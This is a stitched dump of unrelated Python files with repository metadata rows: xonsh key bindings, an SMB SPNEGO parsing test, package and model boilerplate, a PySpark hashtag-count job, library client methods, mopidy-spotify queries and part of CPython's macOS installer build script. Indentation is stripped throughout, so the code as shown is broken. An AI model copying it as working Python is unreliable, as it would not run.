"""Check if cursor is at beginning of a line other than the first line in a
multiline document
"""
app = get_app()
before_cursor = app.current_buffer.document.current_line_before_cursor
return bool(
len(before_cursor) == 0 and not app.current_buffer.document.on_first_line
)
@Condition
def end_of_line():
"""Check if cursor is at the end of a line other than the last line in a
multiline document
"""
d = get_app().current_buffer.document
at_end = d.is_cursor_at_the_end_of_line
last_line = d.is_cursor_at_the_end
return bool(at_end and not last_line)
@Condition
def should_confirm_completion():
"""Check if completion needs confirmation"""
return (
XSH.env.get("COMPLETIONS_CONFIRM") and get_app().current_buffer.complete_state
)
# Copied from prompt-toolkit's key_binding/bindings/basic.py
@Condition
def ctrl_d_condition():
"""Ctrl-D binding is only active when the default buffer is selected and
empty.
"""
if XSH.env.get("IGNOREEOF"):
return False
else:
app = get_app()
buffer_name = app.current_buffer.name
return buffer_name == DEFAULT_BUFFER and not app.current_buffer.text
@Condition
def autopair_condition():
"""Check if XONSH_AUTOPAIR is set"""
return XSH.env.get("XONSH_AUTOPAIR", False)
@Condition
def whitespace_or_bracket_before():
"""Check if there is whitespace or an opening
bracket to the left of the cursor"""
d = get_app().current_buffer.document
return bool(
d.cursor_position == 0
or d.char_before_cursor.isspace()
or d.char_before_cursor in "([{"
)
@Condition
def whitespace_or_bracket_after():
"""Check if there is whitespace or a closing
bracket to the right of the cursor"""
d = get_app().current_buffer.document
return bool(
d.is_cursor_at_the_end_of_line
or d.current_char.isspace()
or d.current_char in ")]}"
)
def wrap_selection(buffer, left, right=None):
selection_state = buffer.selection_state
for start, end in buffer.document.selection_ranges():
buffer.transform_region(start, end, lambda s: f"{left}{s}{right}")
# keep the selection of the inner expression
# e.g. `echo |Hello World|` -> `echo "|Hello World|"`
buffer.cursor_position += 1
selection_state.original_cursor_position += 1
buffer.selection_state = selection_state
def load_xonsh_bindings(ptk_bindings: KeyBindingsBase) -> KeyBindingsBase:
"""
Load custom key bindings.
Parameters
----------
ptk_bindings :
The default prompt toolkit bindings. We need these to add aliases to them.
"""
key_bindings = KeyBindings()
handle = key_bindings.add
has_selection = HasSelection()
insert_mode = ViInsertMode() | EmacsInsertMode()
if XSH.env["XONSH_CTRL_BKSP_DELETION"]:
# Not all terminal emulators emit the same keys for backspace, therefore
# ptk always maps backspace ("\x7f") to ^H ("\x08"), and all the backspace bindings are registered for ^H.
# This means we can't re-map backspace and instead we register a new "real-ctrl-bksp" key.
# See https://github.com/xonsh/xonsh/issues/4407
if ON_WINDOWS:
# On windows BKSP is "\x08" and CTRL-BKSP is "\x7f"
REAL_CTRL_BKSP = "\x7f"
# PTK uses a second mapping
from prompt_toolkit.input import win32 as ptk_win32
ptk_win32.ConsoleInputReader.mappings[b"\x7f"] = REAL_CTRL_BKSP # type: ignore
else:
REAL_CTRL_BKSP = "\x08"
# Prompt-toolkit allows using single-character keys that aren't in the `Keys` enum.
ansi_escape_sequences.ANSI_SEQUENCES[REAL_CTRL_BKSP] = REAL_CTRL_BKSP # type: ignore
ansi_escape_sequences.REVERSE_ANSI_SEQUENCES[REAL_CTRL_BKSP] = REAL_CTRL_BKSP # type: ignore
@handle(REAL_CTRL_BKSP, filter=insert_mode)
def delete_word(event):
"""Delete a single word (like ALT-backspace)"""
get_by_name("backward-kill-word").call(event)
@handle(Keys.Tab, filter=tab_insert_indent)
def insert_indent(event):
"""
If there are only whitespaces before current cursor position insert
indent instead of autocompleting.
"""
env = XSH.env
event.cli.current_buffer.insert_text(env.get("INDENT"))
@handle(Keys.Tab, filter=~tab_insert_indent & tab_menu_complete)
def menu_complete_select(event):
"""Start completion in menu-complete mode, or tab to next completion"""
b = event.current_buffer
if b.complete_state:
b.complete_next()
else:
b.start_completion(select_first=True)
@handle(Keys.ControlX, Keys.ControlE, filter=~has_selection)
def open_editor(event):
"""Open current buffer in editor"""
event.current_buffer.open_in_editor(event.cli)
@handle(Keys.BackTab, filter=insert_mode)
def insert_literal_tab(event):
"""Insert literal tab on Shift+Tab instead of autocompleting"""
b = event.current_buffer
if b.complete_state:
b.complete_previous()
else:
env = XSH.env
event.cli.current_buffer.insert_text(env.get("INDENT"))
def generate_parens_handlers(left, right):
@handle(left, filter=autopair_condition)
def insert_left_paren(event):
buffer = event.cli.current_buffer
if has_selection():
wrap_selection(buffer, left, right)
elif whitespace_or_bracket_after():
buffer.insert_text(left)
buffer.insert_text(right, move_cursor=False)
else:
buffer.insert_text(left)
@handle(right, filter=autopair_condition)
def overwrite_right_paren(event):
buffer = event.cli.current_buffer
if buffer.document.current_char == right:
buffer.cursor_position += 1
else:
buffer.insert_text(right)
generate_parens_handlers("(", ")")
generate_parens_handlers("[", "]")
generate_parens_handlers("{", "}")
def generate_quote_handler(quote):
@handle(quote, filter=autopair_condition)
def insert_quote(event):
buffer = event.cli.current_buffer
if has_selection():
wrap_selection(buffer, quote, quote)
elif buffer.document.current_char == quote:
buffer.cursor_position += 1
elif whitespace_or_bracket_before() and whitespace_or_bracket_after():
buffer.insert_text(quote)
buffer.insert_text(quote, move_cursor=False)
else:
buffer.insert_text(quote)
generate_quote_handler("'")
generate_quote_handler('"')
@handle(Keys.Backspace, filter=autopair_condition)
def delete_brackets_or_quotes(event):
"""Delete empty pair of brackets or quotes"""
buffer = event.cli.current_buffer
before = buffer.document.char_before_cursor
after = buffer.document.current_char
if any(
[before == b and after == a for (b, a) in ["()", "[]", "{}", "''", '""']]
):
buffer.delete(1)
buffer.delete_before_cursor(1)
@handle(Keys.ControlD, filter=ctrl_d_condition)
def call_exit_alias(event):
"""Use xonsh exit function"""
b = event.cli.current_buffer
b.validate_and_handle()
xonsh_exit([])
@handle(Keys.ControlJ, filter=IsMultiline() & insert_mode)
@handle(Keys.ControlM, filter=IsMultiline() & insert_mode)
def multiline_carriage_return(event):
"""Wrapper around carriage_return multiline parser"""
b = event.cli.current_buffer
carriage_return(b, event.cli)
@handle(Keys.ControlJ, filter=should_confirm_completion)
@handle(Keys.ControlM, filter=should_confirm_completion)
def enter_confirm_completion(event):
"""Ignore <enter> (confirm completion)"""
event.current_buffer.complete_state = None
@handle(Keys.Escape, filter=should_confirm_completion)
def esc_cancel_completion(event):
"""Use <ESC> to cancel completion"""
event.cli.current_buffer.cancel_completion()
@handle(Keys.Escape, Keys.ControlJ)
def execute_block_now(event):
"""Execute a block of text irrespective of cursor position"""
b = event.cli.current_buffer
b.validate_and_handle()
@handle(Keys.Left, filter=beginning_of_line)
def wrap_cursor_back(event):
"""Move cursor to end of previous line unless at beginning of
document
"""
b = event.cli.current_buffer
b.cursor_up(count=1)
relative_end_index = b.document.get_end_of_line_position()
b.cursor_right(count=relative_end_index)
@handle(Keys.Right, filter=end_of_line)
def wrap_cursor_forward(event):
"""Move cursor to beginning of next line unless at end of document"""
b = event.cli.current_buffer
relative_begin_index = b.document.get_start_of_line_position()
b.cursor_left(count=abs(relative_begin_index))
b.cursor_down(count=1)
@handle(Keys.ControlM, filter=IsSearching())
@handle(Keys.ControlJ, filter=IsSearching())
def accept_search(event):
search.accept_search()
@handle(Keys.ControlZ)
def skip_control_z(event):
"""Prevents the writing of ^Z to the prompt, if Ctrl+Z was pressed
during the previous command.
"""
pass
@handle(Keys.ControlX, Keys.ControlX, filter=has_selection)
def _cut(event):
"""Cut selected text."""
data = event.current_buffer.cut_selection()
event.app.clipboard.set_data(data)
@handle(Keys.ControlX, Keys.ControlC, filter=has_selection)
def _copy(event):
"""Copy selected text."""
data = event.current_buffer.copy_selection()
event.app.clipboard.set_data(data)
@handle(Keys.ControlV, filter=insert_mode | has_selection)
def _yank(event):
"""Paste selected text."""
buff = event.current_buffer
if buff.selection_state:
buff.cut_selection()
get_by_name("yank").call(event)
def create_alias(new_keys, original_keys):
bindings = ptk_bindings.get_bindings_for_keys(tuple(original_keys))
for original_binding in bindings:
handle(*new_keys, filter=original_binding.filter)(original_binding.handler)
# Complete a single auto-suggestion word
create_alias([Keys.ControlRight], ["escape", "f"])
return key_bindings
| 33.951613
| 114
| 0.676485
|
8e0aa91e35340eb48cf5367b084df1e158d82b10
| 28
|
py
|
Python
|
py_blender_room/framework/sceneobject.py
|
hq9000/py_blender_room
|
62b2722e42eb0411930472dea4c2fac616768e2d
|
[
"MIT"
] | 3
|
2020-11-22T17:46:27.000Z
|
2022-01-07T11:28:29.000Z
|
py_blender_room/framework/sceneobject.py
|
hq9000/py_blender_room
|
62b2722e42eb0411930472dea4c2fac616768e2d
|
[
"MIT"
] | 1
|
2020-08-31T02:46:06.000Z
|
2020-08-31T07:58:06.000Z
|
py_blender_room/framework/sceneobject.py
|
hq9000/py_blender_room
|
62b2722e42eb0411930472dea4c2fac616768e2d
|
[
"MIT"
] | null | null | null |
class SceneObject:
pass
| 9.333333
| 18
| 0.714286
|
8b4edc007c018be1ea18f54a64ddb89ddf84a3b4
| 1,661
|
py
|
Python
|
tests/test_spnego.py
|
martinhoefling/smbprotocol
|
8a4f08244a53a7a818cccc81866cfa62439c0125
|
[
"MIT"
] | null | null | null |
tests/test_spnego.py
|
martinhoefling/smbprotocol
|
8a4f08244a53a7a818cccc81866cfa62439c0125
|
[
"MIT"
] | null | null | null |
tests/test_spnego.py
|
martinhoefling/smbprotocol
|
8a4f08244a53a7a818cccc81866cfa62439c0125
|
[
"MIT"
] | null | null | null |
from pyasn1.codec.der.decoder import decode
from pyasn1.type.univ import ObjectIdentifier
from smbprotocol.spnego import InitialContextToken, NegotiateToken, MechTypes
class TestSpnego(object):
def test_parse_initial_context_token(self):
data = b"\x60\x76\x06\x06\x2b\x06\x01\x05" \
b"\x05\x02\xa0\x6c\x30\x6a\xa0\x3c" \
b"\x30\x3a\x06\x0a\x2b\x06\x01\x04" \
b"\x01\x82\x37\x02\x02\x1e\x06\x09" \
b"\x2a\x86\x48\x82\xf7\x12\x01\x02" \
b"\x02\x06\x09\x2a\x86\x48\x86\xf7" \
b"\x12\x01\x02\x02\x06\x0a\x2a\x86" \
b"\x48\x86\xf7\x12\x01\x02\x02\x03" \
b"\x06\x0a\x2b\x06\x01\x04\x01\x82" \
b"\x37\x02\x02\x0a\xa3\x2a\x30\x28" \
b"\xa0\x26\x1b\x24\x6e\x6f\x74\x5f" \
b"\x64\x65\x66\x69\x6e\x65\x64\x5f" \
b"\x69\x6e\x5f\x52\x46\x43\x34\x31" \
b"\x37\x38\x40\x70\x6c\x65\x61\x73" \
b"\x65\x5f\x69\x67\x6e\x6f\x72\x65"
actual, rdata = decode(data, asn1Spec=InitialContextToken())
assert rdata == b""
assert actual['thisMech'] == ObjectIdentifier('1.3.6.1.5.5.2')
assert isinstance(actual['innerContextToken'], NegotiateToken)
actual_token = actual['innerContextToken']['negTokenInit']
assert actual_token['mechTypes'] == [
MechTypes.NEGOEX,
MechTypes.MS_KRB5,
MechTypes.KRB5,
MechTypes.KRB5_U2U,
MechTypes.NTLMSSP
]
assert actual_token['negHints']['hintName'] == \
"not_defined_in_RFC4178@please_ignore"
| 41.525
| 77
| 0.578567
|
4dff9b293bf5a1dcd67e1200ba30c20d6c5091a7
| 554
|
py
|
Python
|
setup.py
|
logmatic/logmatic-python
|
15d39c8c05f903054aaed9a5213f47756c0870ec
|
[
"MIT"
] | 38
|
2016-02-12T17:02:16.000Z
|
2019-03-28T19:56:27.000Z
|
setup.py
|
logmatic/logmatic-python
|
15d39c8c05f903054aaed9a5213f47756c0870ec
|
[
"MIT"
] | 7
|
2016-03-03T17:03:09.000Z
|
2018-01-04T12:29:05.000Z
|
setup.py
|
logmatic/logmatic-python
|
15d39c8c05f903054aaed9a5213f47756c0870ec
|
[
"MIT"
] | 10
|
2016-02-23T09:34:12.000Z
|
2018-11-23T00:30:07.000Z
|
from distutils.core import setup
setup(
name='logmatic-python',
version='0.1.7',
author='Logmatic.io support team',
author_email='support@logmatic.io',
packages = ['logmatic'],
scripts=[],
url='https://github.com/logmatic/logmatic-python',
download_url = 'https://github.com/logmatic/logmatic-python/tarball/0.1.6',
license='MIT',
long_description=open('README.rst').read(),
description='Python plugin to send logs to Logmatic.io',
install_requires = ['python-json-logger'],
keywords = ['logmatic']
)
| 30.777778
| 79
| 0.673285
|
b5b9061cac9e8b8a6405a456f35de4d5cc224353
| 5,251
|
py
|
Python
|
clumioapi/models/audit_parent_entity.py
|
clumio-code/clumio-python-sdk
|
63bfaf3afed5c0ab4bae3dd1be52271249d07c51
|
[
"Apache-2.0"
] | null | null | null |
clumioapi/models/audit_parent_entity.py
|
clumio-code/clumio-python-sdk
|
63bfaf3afed5c0ab4bae3dd1be52271249d07c51
|
[
"Apache-2.0"
] | 1
|
2021-09-16T05:56:05.000Z
|
2021-09-16T05:56:05.000Z
|
clumioapi/models/audit_parent_entity.py
|
clumio-code/clumio-python-sdk
|
63bfaf3afed5c0ab4bae3dd1be52271249d07c51
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2021. Clumio, Inc.
#
from typing import Any, Dict, Mapping, Optional, Sequence, Type, TypeVar
T = TypeVar('T', bound='AuditParentEntity')
class AuditParentEntity:
"""Implementation of the 'AuditParentEntity' model.
The parent object of the primary entity associated with or affected by the
    audit. If the primary entity is not a vmware entity, this field will have a value
    of null. For example, "vmware_vcenter" is the parent entity of primary entity
"vmware_vm".
Attributes:
id:
A system-generated ID assigned to this entity.
type:
The following table describes the entity types that Clumio supports.
+--------------------------------+---------------------------------------------+
| Entity Type | Details |
+================================+=============================================+
| vmware_vcenter | VMware vCenter. |
+--------------------------------+---------------------------------------------+
| vmware_vm | VMware virtual machine. |
+--------------------------------+---------------------------------------------+
| vmware_vm_folder | VMware VM folder. |
+--------------------------------+---------------------------------------------+
| vmware_datacenter | VMware data center. |
+--------------------------------+---------------------------------------------+
| vmware_datacenter_folder | VMware data center folder. |
+--------------------------------+---------------------------------------------+
| vmware_tag | VMware tag. |
+--------------------------------+---------------------------------------------+
| vmware_category | VMware tag category. |
+--------------------------------+---------------------------------------------+
| vmware_compute_resource | VMware compute resource. |
+--------------------------------+---------------------------------------------+
| vmware_compute_resource_folder | VMware compute resource folder. |
+--------------------------------+---------------------------------------------+
| aws_ebs_volume | AWS EBS volume. |
+--------------------------------+---------------------------------------------+
| aws_connection | AWS connection mediated by a CloudFormation |
| | stack. |
+--------------------------------+---------------------------------------------+
| aws_environment | AWS environment specified by an |
| | account/region pair. |
+--------------------------------+---------------------------------------------+
| aws_tag | AWS tag. |
+--------------------------------+---------------------------------------------+
| aws_cmk | AWS Customer Master Key used to encrypt |
| | data. |
+--------------------------------+---------------------------------------------+
value:
A system-generated value assigned to the entity. For example, if the primary
entity type is "vmware_vm" for a virtual machine, then the value is the name of
the VM.
"""
# Create a mapping from Model property names to API property names
_names = {'id': 'id', 'type': 'type', 'value': 'value'}
def __init__(self, id: str = None, type: str = None, value: str = None) -> None:
"""Constructor for the AuditParentEntity class."""
# Initialize members of the class
self.id: str = id
self.type: str = type
self.value: str = value
@classmethod
def from_dictionary(cls: Type, dictionary: Mapping[str, Any]) -> Optional[T]:
"""Creates an instance of this model from a dictionary
Args:
dictionary: A dictionary representation of the object as obtained
from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if not dictionary:
return None
# Extract variables from the dictionary
id = dictionary.get('id')
type = dictionary.get('type')
value = dictionary.get('value')
# Return an object of this model
return cls(id, type, value)
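# Illustrative usage only (the id and value below are made-up placeholders, not from the API docs):
#   entity = AuditParentEntity.from_dictionary({'id': '123', 'type': 'vmware_vm', 'value': 'prod-vm-01'})
#   assert entity.type == 'vmware_vm'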
| 54.697917
| 92
| 0.354028
|
a115476a9cc5b9a34dc970ac9322ab78255c1495
| 377
|
py
|
Python
|
manafa/parsing/batteryStats/__init__.py
|
greensoftwarelab/E-MANAFA
|
d0ccc01a821af5b02fdcb588a4d14ff56a26cd5d
|
[
"MIT"
] | null | null | null |
manafa/parsing/batteryStats/__init__.py
|
greensoftwarelab/E-MANAFA
|
d0ccc01a821af5b02fdcb588a4d14ff56a26cd5d
|
[
"MIT"
] | null | null | null |
manafa/parsing/batteryStats/__init__.py
|
greensoftwarelab/E-MANAFA
|
d0ccc01a821af5b02fdcb588a4d14ff56a26cd5d
|
[
"MIT"
] | null | null | null |
""" This module contains Classes to parse and manipulate information coming from the BatteryStats Android Service.
BatteryStatsConstants contains constants associated with batterystats events and respective meaning. BatteryStatsParser.py
contains BatteryStatsParser and utils to parse dumpsys batterystats output and obtain/filter events that occurred during given
time ranges.
"""
| 53.857143
| 122
| 0.848806
|
1411de61c0e7846ff337cb133583c0a9df4ceec3
| 281
|
py
|
Python
|
apps/core/managers.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
apps/core/managers.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
apps/core/managers.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
from django.db import models
from .query import UndeletedQuerySet
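# Manager that hides soft-deleted rows: every queryset it returns filters out records whose deleted_at is set.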
class UndeletedManager(models.Manager):
def get_queryset(self):
return UndeletedQuerySet(
model=self.model, using=self._db,
hints=self._hints).filter(deleted_at__isnull=True)
| 23.416667
| 62
| 0.715302
|
71795db1e29dc4a3c9d5344a142b36b029a06a8d
| 1,438
|
py
|
Python
|
adminmgr/media/code/A3/task1/BD_0012_0792_0948_1324_5SDKuyT.py
|
IamMayankThakur/test-bigdata
|
cef633eb394419b955bdce479699d0115d8f99c3
|
[
"Apache-2.0"
] | 9
|
2019-11-08T02:05:27.000Z
|
2021-12-13T12:06:35.000Z
|
adminmgr/media/code/A3/task1/BD_0012_0792_0948_1324_5SDKuyT.py
|
IamMayankThakur/test-bigdata
|
cef633eb394419b955bdce479699d0115d8f99c3
|
[
"Apache-2.0"
] | 6
|
2019-11-27T03:23:16.000Z
|
2021-06-10T19:15:13.000Z
|
adminmgr/media/code/A3/task1/BD_0012_0792_0948_1324_5SDKuyT.py
|
IamMayankThakur/test-bigdata
|
cef633eb394419b955bdce479699d0115d8f99c3
|
[
"Apache-2.0"
] | 4
|
2019-11-26T17:04:27.000Z
|
2021-12-13T11:57:03.000Z
|
from __future__ import print_function
import sys
from pyspark.sql import SparkSession
from pyspark.sql.functions import *
from pyspark.sql.types import *
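# Structured Streaming job: watch an HDFS directory for ';'-separated tweet CSVs and keep a running count of hashtags.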
spark_session_obj = SparkSession.builder\
.appName('StructuredSpark')\
.getOrCreate()
userSchema = StructType([
StructField('ID', IntegerType(), True),
StructField('Lang', StringType(), True),
StructField('Date', StringType(), True),
StructField('Source', StringType(), True),
StructField('Len', IntegerType(), True),
StructField('Likes', IntegerType(), True),
StructField('RTs', IntegerType(), True),
StructField('Hashtags', StringType(), True),
StructField('UserMentionNames', StringType(), True),
StructField('UserMentionID', StringType(), True),
StructField('Name', StringType(), True),
StructField('Place', StringType(), True),
StructField('Followers', IntegerType(), True),
StructField('Friends', IntegerType(), True)
])
wordlin_dataframe = spark_session_obj.readStream\
.option('sep', ';')\
.option('header', 'false')\
.schema(userSchema)\
.csv("hdfs://localhost:9000/stream")
wordlin_dataframe.createOrReplaceTempView("tables")
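# Running top-5 hashtags over everything streamed so far; the 'complete' output mode below re-emits the full table on each trigger.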
common_hashtag_dataframe = spark_session_obj.sql("select Hashtags, count(Hashtags) as count from tables group by Hashtags order by count desc limit 5")
query_obj = common_hashtag_dataframe.writeStream\
.outputMode('complete').format('console')
query_run = query_obj.start()
query_run.awaitTermination(100)
query_run.stop()
| 32.681818
| 151
| 0.75452
|
f48bc7142d0b61afd9e9667af7ef52344b2d91ba
| 275
|
py
|
Python
|
Python/Sets/Set .difference() Operation.py
|
guptamadhur/HackerRank
|
e0f1ba82296eea88d2b34132d3b1a28cd67ffa03
|
[
"MIT"
] | null | null | null |
Python/Sets/Set .difference() Operation.py
|
guptamadhur/HackerRank
|
e0f1ba82296eea88d2b34132d3b1a28cd67ffa03
|
[
"MIT"
] | null | null | null |
Python/Sets/Set .difference() Operation.py
|
guptamadhur/HackerRank
|
e0f1ba82296eea88d2b34132d3b1a28cd67ffa03
|
[
"MIT"
] | null | null | null |
# Author: Madhur Gupta
# Github: github.com/guptamadhur
# Project: Hacker Rank Practice Python
if __name__ == '__main__':
n = int(input())
A = set(map(int,input().split()))
n = int(input())
B = set(map(int, input().split()))
print(len(A.difference(B)))
| 22.916667
| 38
| 0.618182
|
d5308f4cc7137d2226e4a963a923b3db362368c5
| 3,350
|
py
|
Python
|
Database/client_methods.py
|
RomaOkorosso/fes-test-task
|
cfd8212dfbc9b2b0669ce6e1ea0a59b3f96809dc
|
[
"MIT"
] | null | null | null |
Database/client_methods.py
|
RomaOkorosso/fes-test-task
|
cfd8212dfbc9b2b0669ce6e1ea0a59b3f96809dc
|
[
"MIT"
] | null | null | null |
Database/client_methods.py
|
RomaOkorosso/fes-test-task
|
cfd8212dfbc9b2b0669ce6e1ea0a59b3f96809dc
|
[
"MIT"
] | null | null | null |
# created by RomaOkorosso at 21.03.2021
# client_methods.py
from datetime import datetime, timedelta, date
from typing import Optional, List
from Models.models import Client, TakenBook, Book
from Models import schemas
from sqlalchemy.orm import Session
from Database.exceptions import *
from pydantic import ValidationError
class ClientMethods:
@staticmethod
def add_client(db: Session, client: schemas.AddClient):
client = Client(**client.dict())
db.add(client)
db.commit()
return client
@staticmethod
def get_client(db: Session, client_id: int):
client: Client = db.query(Client).filter(Client.id == client_id).first()
if client is None:
raise ItemNotFound(f"Have no client with id: {client_id} in database")
return client
@staticmethod
def update_client(db: Session, new_client: schemas.Client):
client = db.query(Client).filter(Client.id == new_client.id).first()
if client is None:
raise ItemNotFound(f"Have no client with id: {new_client.id} in database")
        for key, value in new_client.__dict__.items():
setattr(client, key, value)
db.commit()
@staticmethod
def take_book(db: Session, book_id: int, client_id: int):
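        # Decrement the book's stock, remember it on the client's borrow lists, and record a TakenBook row.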
book: Book = db.query(Book).filter(Book.id == book_id).first()
try:
client = ClientMethods.get_client(db, client_id)
except ItemNotFound as err:
print(err)
else:
            if client.taken_books_now_id is None:
                client.taken_books_now_id = [book_id]
            else:
                client.taken_books_now_id = client.taken_books_now_id + [book_id]
            if client.all_taken_books_id is None:
                client.all_taken_books_id = [book_id]
            else:
                client.all_taken_books_id = client.all_taken_books_id + [book_id]
if book is None:
raise ItemNotFound(f"Have no such book with id: {book_id}")
if book.count == 0:
raise NotEnoughBook(f"Have no enough books with id: {book_id}")
taken_book = TakenBook(
book_id=book_id,
client_id=client_id,
taken_date=datetime.today().date()
)
book.count -= 1
db.add(taken_book)
db.commit()
db.flush()
db.refresh(book)
return book
@staticmethod
def return_book(db: Session, taken_book_id: int):
from Database.book_methods import BookMethods
try:
book: Book
client: Client
BookMethods.return_book(db, taken_book_id)
taken_book = BookMethods.get_taken_book_by_id(db, taken_book_id)
            book_id = taken_book.book_id
client_id = taken_book.client_id
book = BookMethods.get_book(db, book_id)
client = ClientMethods.get_client(db, client_id)
except ItemNotFound as err:
print(err)
else:
print(type(client.taken_books_now_id))
books: List[int] = client.taken_books_now_id.copy()
books.remove(book_id)
client.taken_books_now_id = books
book.count = book.count + 1
book.taken_count = book.taken_count + 1
ClientMethods.update_client(db, client)
db.commit()
return book
| 33.5
| 86
| 0.625075
|
746bcce002d007d7be186ffdbf8be9207ef9e47e
| 3,784
|
py
|
Python
|
mopidy_spotify/distinct.py
|
jimbofreedman/mopidy-spotify
|
6b3f41368cc22653d13c1ac1696e66bd5744a95a
|
[
"Apache-2.0"
] | 7
|
2018-06-24T12:57:19.000Z
|
2020-04-28T14:35:26.000Z
|
mopidy_spotify/distinct.py
|
jimbofreedman/mopidy-spotify
|
6b3f41368cc22653d13c1ac1696e66bd5744a95a
|
[
"Apache-2.0"
] | null | null | null |
mopidy_spotify/distinct.py
|
jimbofreedman/mopidy-spotify
|
6b3f41368cc22653d13c1ac1696e66bd5744a95a
|
[
"Apache-2.0"
] | 3
|
2018-05-29T00:05:37.000Z
|
2019-02-28T09:47:43.000Z
|
from __future__ import unicode_literals
import logging
import spotify
from mopidy_spotify import search
logger = logging.getLogger(__name__)
def get_distinct(config, session, web_client, field, query=None):
# To make the returned data as interesting as possible, we limit
# ourselves to data extracted from the user's playlists when no search
# query is included.
if field == 'artist':
result = _get_distinct_artists(
config, session, web_client, query)
elif field == 'albumartist':
result = _get_distinct_albumartists(
config, session, web_client, query)
elif field == 'album':
result = _get_distinct_albums(
config, session, web_client, query)
elif field == 'date':
result = _get_distinct_dates(
config, session, web_client, query)
else:
result = set()
return result - {None}
def _get_distinct_artists(config, session, web_client, query):
logger.debug('Getting distinct artists: %s', query)
if query:
search_result = _get_search(
config, session, web_client, query, artist=True)
return {artist.name for artist in search_result.artists}
else:
return {
artist.name
for track in _get_playlist_tracks(config, session)
for artist in track.artists}
def _get_distinct_albumartists(config, session, web_client, query):
logger.debug(
'Getting distinct albumartists: %s', query)
if query:
search_result = _get_search(
config, session, web_client, query, album=True)
return {
artist.name
for album in search_result.albums
for artist in album.artists
if album.artists}
else:
return {
track.album.artist.name
for track in _get_playlist_tracks(config, session)
if track.album and track.album.artist}
def _get_distinct_albums(config, session, web_client, query):
logger.debug('Getting distinct albums: %s', query)
if query:
search_result = _get_search(
config, session, web_client, query, album=True)
return {album.name for album in search_result.albums}
else:
return {
track.album.name
for track in _get_playlist_tracks(config, session)
if track.album}
def _get_distinct_dates(config, session, web_client, query):
logger.debug('Getting distinct album years: %s', query)
if query:
search_result = _get_search(
config, session, web_client, query, album=True)
return {
album.date
for album in search_result.albums
if album.date not in (None, '0')}
else:
return {
'%s' % track.album.year
for track in _get_playlist_tracks(config, session)
if track.album and track.album.year not in (None, 0)}
def _get_search(
config, session, web_client, query,
album=False, artist=False, track=False):
types = []
if album:
types.append('album')
if artist:
types.append('artist')
if track:
types.append('track')
return search.search(
config, session, web_client, query, types=types)
def _get_playlist_tracks(config, session):
if not config['allow_playlists']:
return
for playlist in session.playlist_container:
if not isinstance(playlist, spotify.Playlist):
continue
playlist.load(config['timeout'])
for track in playlist.tracks:
try:
track.load(config['timeout'])
yield track
except spotify.Error: # TODO Why did we get "General error"?
continue
| 30.031746
| 74
| 0.624207
|
4bb942a733b86fa63b62487fe39e6b6376b8011b
| 61,737
|
py
|
Python
|
Mac/BuildScript/build-installer.py
|
myarchsource/python2
|
967e509ff8ad450919d5cf708b8e35387b63db03
|
[
"CNRI-Python-GPL-Compatible"
] | 473
|
2017-02-03T04:03:02.000Z
|
2022-02-12T17:44:25.000Z
|
Mac/BuildScript/build-installer.py
|
myarchsource/python2
|
967e509ff8ad450919d5cf708b8e35387b63db03
|
[
"CNRI-Python-GPL-Compatible"
] | 70
|
2017-02-02T21:20:07.000Z
|
2022-02-04T15:32:45.000Z
|
Mac/BuildScript/build-installer.py
|
myarchsource/python2
|
967e509ff8ad450919d5cf708b8e35387b63db03
|
[
"CNRI-Python-GPL-Compatible"
] | 37
|
2017-02-11T21:02:34.000Z
|
2020-11-16T10:51:45.000Z
|
#!/usr/bin/env python
"""
This script is used to build "official" universal installers on macOS.
NEW for 3.6.8 / 2.7.16:
- also build and use Tk 8.6 for 10.6+ installers
NEW for 3.6.5:
- support Intel 64-bit-only () and 32-bit-only installer builds
- build and link with private Tcl/Tk 8.6 for 10.9+ builds
- deprecate use of explicit SDK (--sdk-path=) since all but the oldest
versions of Xcode support implicit setting of an SDK via environment
variables (SDKROOT and friends, see the xcrun man page for more info).
The SDK stuff was primarily needed for building universal installers
for 10.4; so as of 3.6.5, building installers for 10.4 is no longer
supported with build-installer.
- use generic "gcc" as compiler (CC env var) rather than "gcc-4.2"
Please ensure that this script keeps working with Python 2.5, to avoid
bootstrap issues (/usr/bin/python is Python 2.5 on OSX 10.5). Doc builds
use current versions of Sphinx and require a reasonably current python3.
Sphinx and dependencies are installed into a venv using the python3's pip
so will fetch them from PyPI if necessary. Since python3 is now used for
Sphinx, build-installer.py should also be converted to use python3!
For 10.6 or greater deployment targets, build-installer builds and links
with its own copy of Tcl/Tk 8.6 and the rest of this paragraph does not
apply. Otherwise, build-installer requires an installed third-party version
of Tcl/Tk 8.4 (for OS X 10.4 and 10.5 deployment targets) installed in
/Library/Frameworks. For 10.4 or 10.5, the Python built by this script
when installed will attempt to dynamically link first to Tcl and Tk frameworks
in /Library/Frameworks if available otherwise fall back to the ones in
/System/Library/Framework. For 10.4 or 10.5, we recommend
installing the most recent ActiveTcl 8.5 or 8.4 version, depending
on the deployment target. The actual version linked to depends on the
path of /Library/Frameworks/{Tcl,Tk}.framework/Versions/Current.
Usage: see USAGE variable in the script.
"""
import platform, os, sys, getopt, textwrap, shutil, stat, time, pwd, grp
try:
import urllib2 as urllib_request
except ImportError:
import urllib.request as urllib_request
STAT_0o755 = ( stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
| stat.S_IRGRP | stat.S_IXGRP
| stat.S_IROTH | stat.S_IXOTH )
STAT_0o775 = ( stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
| stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP
| stat.S_IROTH | stat.S_IXOTH )
INCLUDE_TIMESTAMP = 1
VERBOSE = 1
from plistlib import Plist
try:
from plistlib import writePlist
except ImportError:
# We're run using python2.3
def writePlist(plist, path):
plist.write(path)
def shellQuote(value):
"""
Return the string value in a form that can safely be inserted into
a shell command.
"""
return "'%s'"%(value.replace("'", "'\"'\"'"))
def grepValue(fn, variable):
"""
    Return the unquoted value of a variable from a file.
QUOTED_VALUE='quotes' -> str('quotes')
UNQUOTED_VALUE=noquotes -> str('noquotes')
"""
variable = variable + '='
for ln in open(fn, 'r'):
if ln.startswith(variable):
value = ln[len(variable):].strip()
